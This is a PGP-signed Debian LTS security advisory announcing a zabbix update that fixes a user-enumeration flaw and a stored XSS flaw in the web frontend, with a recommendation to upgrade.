-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 From: Sylvain Beucler <[email protected]> To: [email protected] Subject: [SECURITY] [DLA 2631-1] zabbix security update
- ------------------------------------------------------------------------- Debian LTS Advisory DLA-2631-1 [email protected] https://www.debian.org/lts/security/ April 21, 2021 https://wiki.debian.org/LTS - ------------------------------------------------------------------------- Package : zabbix Version : 1:3.0.32+dfsg-0+deb9u1 CVE ID : CVE-2019-15132 CVE-2020-15803 Debian Bug : 935027 966146 Multiple vulnerabilities were discovered in Zabbix, a network monitoring solution. An attacker may enumerate valid users and redirect to external links through the zabbix web frontend. CVE-2019-15132 Zabbix allows User Enumeration. With login requests, it is possible to enumerate application usernames based on the variability of server responses (e.g., the "Login name or password is incorrect" and "No permissions for system access" messages, or just blocking for a number of seconds). This affects both api_jsonrpc.php and index.php. CVE-2020-15803 Zabbix allows stored XSS in the URL Widget. This fix was mistakenly dropped in previous upload 1:3.0.31+dfsg-0+deb9u1. This update also includes several other bug fixes and improvements. For more information please refer to the upstream changelog file. For Debian 9 stretch, these problems have been fixed in version 1:3.0.32+dfsg-0+deb9u1. We recommend that you upgrade your zabbix packages. For the detailed security status of zabbix please refer to its security tracker page at: https://security-tracker.debian.org/tracker/zabbix Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE1vEOfV7HXWKqBieIDTl9HeUlXjAFAmCAOTwACgkQDTl9HeUl XjBBmRAAoeaXBWcAby5VexUL5aDbq7tF0yKtyxkT0GX0xLhSvsv3BY0RNGeifMML eRanx9I4t4kz1M+lQWwQObXLtMcptKx2O0AkEG+7JnyaEvKG/qZD9cfwdDtKrj0b SQMDfeM49LJzkmE2rRUO+AbYoCewNo37ydgUGE06UE+2kXGHfirrospTW2I/i3yS in7lUNCd4GcX6GZEMKSTSGfTxpq5szoIIU61jOZtGm1NSalBiA7SGIxQ0zGESJ0H /3avQqaqIr0DZ6LfUCBICEBq5SF/YzI7tsvfKrk/sSwbU3rJL1hOA8MHb5iRcPft HnIwIU1gTyZCxupGEGBJJ7FrJUlUw0p9FEaxLxwryqdUsCUa5fzYngw7EnW8kij6 UiZedOTMwx6LAUUVLr75y1mhyD4eIWdlIuB3WsiOaiC4ZyvOTEJ+cGpfmw6e8Pwx Mn01u8cRg3d5wlBAlUK35XT3uplijY2tg3/JEPWPz5QKuapG14N4WEzOopG2LAg6 WdiT4rV9B9rJfX9dOKyv1BJbO+K9nEQYBDQTe4u3tMPpn+uMHsXhdl6m8dQfXjOg Emv3DPx8zyhwpvbtPmtCFaM7dIKpOVipnJ4+hHecK1FZKYAxaMJwFkfkIXtmjWks yvF8xFvcWdc+xdtZZIoFY8ofkq9OM/B5n1Qf68ShnJXrdegdIjk= =X+nD -----END PGP SIGNATURE-----
